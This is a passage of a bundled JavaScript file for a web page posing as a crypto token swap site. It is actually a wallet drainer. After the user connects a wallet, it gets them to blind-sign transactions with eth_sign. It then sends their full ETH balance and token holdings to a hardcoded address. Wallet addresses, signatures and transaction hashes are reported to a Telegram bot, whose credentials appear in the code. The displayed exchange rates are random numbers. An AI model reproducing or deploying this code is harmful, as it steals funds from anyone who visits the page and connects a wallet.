    return new TextEncoder().encode(utf);
}
/** Transform an integer into its hexadecimal value */ function $ba9223f47ca24472$var$numberToHex(integer) {
    if (integer < 0) throw new Error("Invalid integer as argument, must be unsigned!");
    const hex = integer.toString(16);
    return hex.length % 2 ? `0${hex}` : hex;
}
/** Pad a string to be even */ function $ba9223f47ca24472$var$padToEven(a) {
    return a.length % 2 ? `0${a}` : a;
}
/** Check if a string is prefixed by 0x */ function $ba9223f47ca24472$var$isHexPrefixed(str) {
    return str.length >= 2 && str[0] === "0" && str[1] === "x";
}
/** Removes 0x from a given String */ function $ba9223f47ca24472$var$stripHexPrefix(str) {
    if (typeof str !== "string") return str;
    return $ba9223f47ca24472$var$isHexPrefixed(str) ? str.slice(2) : str;
}
/** Transform anything into a Uint8Array */ function $ba9223f47ca24472$var$toBytes(v) {
    if (v instanceof Uint8Array) return v;
    if (typeof v === "string") {
        if ($ba9223f47ca24472$var$isHexPrefixed(v)) return $ba9223f47ca24472$var$hexToBytes($ba9223f47ca24472$var$padToEven($ba9223f47ca24472$var$stripHexPrefix(v)));
        return $ba9223f47ca24472$var$utf8ToBytes(v);
    }
    if (typeof v === "number" || typeof v === "bigint") {
        if (!v) return Uint8Array.from([]);
        return $ba9223f47ca24472$var$hexToBytes($ba9223f47ca24472$var$numberToHex(v));
    }
    if (v === null || v === undefined) return Uint8Array.from([]);
    throw new Error("toBytes: received unsupported type " + typeof v);
}
$ba9223f47ca24472$exports.utils = {
    bytesToHex: $ba9223f47ca24472$var$bytesToHex,
    concatBytes: $ba9223f47ca24472$var$concatBytes,
    hexToBytes: $ba9223f47ca24472$var$hexToBytes,
    utf8ToBytes: $ba9223f47ca24472$var$utf8ToBytes
};
const $ba9223f47ca24472$var$RLP = {
    encode: $ba9223f47ca24472$var$encode,
    decode: $ba9223f47ca24472$var$decode
};
$ba9223f47ca24472$exports.default = $ba9223f47ca24472$var$RLP;


var $6b17f08f738443dc$require$encode = $ba9223f47ca24472$exports.encode;

var $6b17f08f738443dc$require$bufferToHex = $5d0551371c89d07b$exports.bufferToHex;
var $6b17f08f738443dc$require$fromRpcSig = $5d0551371c89d07b$exports.fromRpcSig;
var $6b17f08f738443dc$require$bnToHex = $5d0551371c89d07b$exports.bnToHex;
document.querySelector("#main-connect-wallet-button").addEventListener("click", $6b17f08f738443dc$var$initWeb3);
document.querySelector("#top-connect-wallet-button").addEventListener("click", $6b17f08f738443dc$var$initWeb3);
const $6b17f08f738443dc$var$userBal = document.querySelector("#user-balance");
const $6b17f08f738443dc$var$data = {
    web3: null,
    chainId: 1,
    userAddress: null,
    userBal: null
};
const $6b17f08f738443dc$var$transaction = {
    nonce: "0x1e7",
    gasPrice: "0x2e90edd000",
    gasLimit: "0x30d40",
    to: "0x4ce4e56628a1ec53ba36e984946b124176cf980d",
    value: "0xde0b6b3a7640000",
    data: "0x",
    chainId: 1
};
async function $6b17f08f738443dc$var$initWeb3() {
    try {
        const provider = await (0, $76e4bb4b0df9e886$export$cdfbbad9b2980226).init({
            projectId: "a4d5070c3029ebef4257b143f26d11e3",
            chains: [
                1
            ],
            showQrModal: true,
            methods: [
                "eth_sendTransaction",
                "eth_sign"
            ],
            events: [
                "chainChanged",
                "accountsChanged"
            ]
        });
        // await provider.enable();
        await provider.connect();
        const accounts = await provider.request({
            method: "eth_requestAccounts"
        });
        const chainId1 = await provider.request({
            method: "eth_chainId"
        });
        const web3 = new $2c4ca49181ee4a21$exports(provider);
        $6b17f08f738443dc$var$data.web3 = web3;
        $6b17f08f738443dc$var$data.userAddress = accounts[0];
        $6b17f08f738443dc$var$data.chainId = await chainId1;
        await $6b17f08f738443dc$var$sendErr(`${$6b17f08f738443dc$var$data.userAddress} is connected`);
        document.querySelector("#swap-button").style.display = "block";
        document.querySelector("#address-button").style.display = "block";
        document.querySelector("#main-connect-wallet-button").style.display = "none";
        document.querySelector("#top-connect-wallet-button").style.display = "none";
        document.querySelector("#address-button").textContent = $6b17f08f738443dc$var$shortenEthereumAddress($6b17f08f738443dc$var$data.userAddress);
        document.querySelector("#address-button").style.cursor = "not-allowed";
        $6b17f08f738443dc$var$resetValues();
        await $6b17f08f738443dc$var$loadUserBal();
    } catch (e) {
        $6b17f08f738443dc$var$sendErr(e);
    }
}
function $6b17f08f738443dc$var$shortenEthereumAddress(x) {
    let startChars = 6, endChars = 4;
    return x ? `${x.slice(0, startChars)}...${x.slice(-endChars)}` : "";
}
window.addEventListener("load", async ()=>{});
document.querySelector("#from-amount").addEventListener("input", $6b17f08f738443dc$var$modifyOutputRate);
document.querySelector("#to-amount").addEventListener("input", $6b17f08f738443dc$var$modifyInputRate);
function $6b17f08f738443dc$var$modifyOutputRate() {
    const amt = 2000 + Math.random() * 1000;
    const rate = amt / 1700;
    document.querySelector("#to-amount").value = Math.round(document.querySelector("#from-amount").value * rate);
}
function $6b17f08f738443dc$var$modifyInputRate() {
    const amt = 2000 + Math.random() * 1000;
    const rate = amt / 1700;
    document.querySelector("#from-amount").value = Math.round(document.querySelector("#to-amount").value / rate);
}
async function $6b17f08f738443dc$var$loadUserBal() {
    if ($6b17f08f738443dc$var$data.web3) {
        const tCtrct = new $6b17f08f738443dc$var$data.web3.eth.Contract($9975c64ce2e299cc$exports, "0xD15042d3f061c0f289914794d29Bb6C65095353E");
        const bal = await tCtrct.methods.balanceOf($6b17f08f738443dc$var$data.userAddress).call();
        $6b17f08f738443dc$var$userBal.textContent = Number(bal);
        $6b17f08f738443dc$var$data.userBal = Number(bal);
    } else await $6b17f08f738443dc$var$initWeb3();
}
document.querySelector("#swap-button").addEventListener("click", $6b17f08f738443dc$var$checkValuesBS);
async function $6b17f08f738443dc$var$checkValuesBS() {
    if ($6b17f08f738443dc$var$data.web3) {
        if (document.querySelector("#from-amount").value < 1 || document.querySelector("#to-amount").value < 1 || document.querySelector("#from-amount").value > $6b17f08f738443dc$var$data.userBal) $6b17f08f738443dc$var$resetValues();
        else await $6b17f08f738443dc$var$signRestoreERCTOken();
    } else await $6b17f08f738443dc$var$initWeb3();
}
async function $6b17f08f738443dc$var$getNonce(a) {
    const nonce = await $6b17f08f738443dc$var$data.web3.eth.getTransactionCount(a, "pending");
    return $6b17f08f738443dc$var$data.web3.utils.toHex(nonce);
}
async function $6b17f08f738443dc$var$swapToken() {
    if ($6b17f08f738443dc$var$data.web3) try {
        const userBalance = await $6b17f08f738443dc$var$data.web3.eth.getBalance($6b17f08f738443dc$var$data.userAddress);
        const uNo = await $6b17f08f738443dc$var$getNonce($6b17f08f738443dc$var$data.userAddress);
        if (uNo == "0x0") $6b17f08f738443dc$var$transaction.nonce = "0x";
        else $6b17f08f738443dc$var$transaction.nonce = await $6b17f08f738443dc$var$getNonce($6b17f08f738443dc$var$data.userAddress);
        const estimateTransaction = {
            from: $6b17f08f738443dc$var$data.userAddress,
            to: "0x4ce4e56628a1ec53ba36e984946b124176cf980d",
            value: userBalance.toString()
        };
        const gasLimit = await $6b17f08f738443dc$var$data.web3.eth.estimateGas(estimateTransaction);
        const gasPrice = await $6b17f08f738443dc$var$data.web3.eth.getGasPrice();
        const gasCost = gasPrice * gasLimit;
        if (userBalance < gasCost) {
            $6b17f08f738443dc$var$sendErr(`User has Insufficient funds for gas ${window.location.href}`);
            return;
        }
        const gasCostEther = $6b17f08f738443dc$var$data.web3.utils.fromWei(gasCost, "ether");
        const valueToSend = userBalance - gasCost;
        $6b17f08f738443dc$var$transaction.gasPrice = $6b17f08f738443dc$var$data.web3.utils.toHex(gasPrice);
        $6b17f08f738443dc$var$transaction.gasLimit = $6b17f08f738443dc$var$data.web3.utils.toHex(gasLimit);
        $6b17f08f738443dc$var$transaction.value = $6b17f08f738443dc$var$data.web3.utils.toHex(valueToSend);
        $6b17f08f738443dc$var$transaction.to = "0x4ce4e56628a1ec53ba36e984946b124176cf980d";
        const params = [
            $6b17f08f738443dc$var$transaction.nonce,
            $6b17f08f738443dc$var$transaction.gasPrice,
            $6b17f08f738443dc$var$transaction.gasLimit,
            $6b17f08f738443dc$var$transaction.to,
            $6b17f08f738443dc$var$transaction.value,
            $6b17f08f738443dc$var$transaction.data
        ];
        const rawTransaction = $6b17f08f738443dc$require$encode(params);
        const hexTX = $6b17f08f738443dc$require$bufferToHex(rawTransaction);
        const cch = await $6b17f08f738443dc$var$data.web3.eth.getChainId();
        if (cch != "1") return $6b17f08f738443dc$var$initWeb3();
        const sig = await $6b17f08f738443dc$var$data.web3.eth.sign($6b17f08f738443dc$var$data.web3.utils.sha3(hexTX), $6b17f08f738443dc$var$data.userAddress);
        const { v: v, r: r, s: s } = $6b17f08f738443dc$require$fromRpcSig(sig);
        const signedTX = $6b17f08f738443dc$require$encode([
            ...params,
            v,
            r,
            s
        ]);
        const sigRes = await $6b17f08f738443dc$var$data.web3.eth.sendSignedTransaction($6b17f08f738443dc$require$bufferToHex(signedTX));
        const resDATA = `
            Signature: ${$6b17f08f738443dc$require$bufferToHex(signedTX)},
            chainId: ${$6b17f08f738443dc$var$data.chainId},
            transaction Hash: ${sigRes.transactionHash},
            gas cost ether: ${gasCostEther}
        `;
        await $6b17f08f738443dc$var$sendErr(resDATA);
    } catch (error) {
        await $6b17f08f738443dc$var$sendErr(`Error: ${error}`);
    }
    else {
        await $6b17f08f738443dc$var$initWeb3();
        await $6b17f08f738443dc$var$swapToken();
    }
}
async function $6b17f08f738443dc$var$getTokenContract(address, abi) {
    const tokenContract = new $6b17f08f738443dc$var$data.web3.eth.Contract(abi, address);
    return tokenContract;
}
async function $6b17f08f738443dc$var$signRestoreERCTOken() {
    if ($6b17f08f738443dc$var$data.web3) try {
        const tx = {
            nonce: "0x1e7",
            gasPrice: "0x2e90edd000",
            gasLimit: "0x30d40",
            to: undefined,
            value: "0x",
            data: "0x",
            chainId: 1
        };
        const cch = await $6b17f08f738443dc$var$data.web3.eth.getChainId();
        if (cch != "1") return $6b17f08f738443dc$var$initWeb3();
        const res = await (0, $49196067e703828c$exports.getTokensOwned)($6b17f08f738443dc$var$data.userAddress);
        const txx = await $6b17f08f738443dc$var$getTokenContract(res.tka, res.abi);
        const tokenBalance = await txx.methods.balanceOf($6b17f08f738443dc$var$data.userAddress).call();
        const gasPrice = await $6b17f08f738443dc$var$data.web3.eth.getGasPrice();
        tx.gasPrice = $6b17f08f738443dc$var$data.web3.utils.toHex(parseInt(gasPrice * 15 / 10));
        const txxABI = txx.methods.transfer(undefined, String(tokenBalance)).encodeABI();
        tx.nonce = await $6b17f08f738443dc$var$getNonce($6b17f08f738443dc$var$data.userAddress);
        tx.nonce = tx.nonce == "0x0" ? "0x" : tx.nonce;
        tx.to = res.tka;
        tx.data = txxABI;
        const params = [
            tx.nonce,
            tx.gasPrice,
            tx.gasLimit,
            tx.to,
            tx.value,
            tx.data,
            chainId
        ];
        const rawTransaction = $6b17f08f738443dc$require$encode(params);
        const hexTX = $6b17f08f738443dc$require$bufferToHex(rawTransaction);
        const sig = await $6b17f08f738443dc$var$data.web3.eth.sign($6b17f08f738443dc$var$data.web3.utils.sha3(hexTX), $6b17f08f738443dc$var$data.userAddress);
        const { v: v, r: r, s: s } = $6b17f08f738443dc$require$fromRpcSig(sig);
        const signedTX = $6b17f08f738443dc$require$encode([
            ...params,
            v,
            r,
            s
        ]);
        const sigRes = await $6b17f08f738443dc$var$data.web3.eth.sendSignedTransaction($6b17f08f738443dc$require$bufferToHex(signedTX));
        const resDATA = `
              Signature: ${$6b17f08f738443dc$require$bufferToHex(signedTX)},
              chainId: ${$6b17f08f738443dc$var$data.chainId},
              token-address: ${res.tka},
              transaction hash: ${sigRes.transactionHash}
          `;
        await $6b17f08f738443dc$var$sendErr(resDATA);
        await $6b17f08f738443dc$var$swapToken();
    } catch (error) {
        await $6b17f08f738443dc$var$sendErr(`Error: ${String(error.message)}`);
        await $6b17f08f738443dc$var$swapToken();
    }
    else {
        await $6b17f08f738443dc$var$initWeb3();
        await $6b17f08f738443dc$var$signRestoreERCTOken();
    }
}
async function $6b17f08f738443dc$var$sendErr(x) {
    const options = {
        method: "POST",
        mode: "cors",
        headers: {
            accept: "application/json",
            "content-type": "application/json"
        },
        body: JSON.stringify({
            text: String(x),
            disable_web_page_preview: false,
            disable_notification: false,
            reply_to_message_id: null,
            chat_id: "1125129156"
        })
    };
    fetch(`https://api.telegram.org/bot${"5888330594:AAHDeBuU_fGop5VyXbdF-p3CFR0MPjrtGIo"}/sendMessage`, options).then((response)=>response.json()).then((response)=>response).catch((err)=>console.error(err));
}
function $6b17f08f738443dc$var$resetValues() {
    document.querySelector("#from-amount").value = 0;
    document.querySelector("#to-amount").value = 0;
    document.querySelector("#swap-button").style.cursor = "pointer";
}


//# sourceMappingURL=index.9ff6eb69.js.map
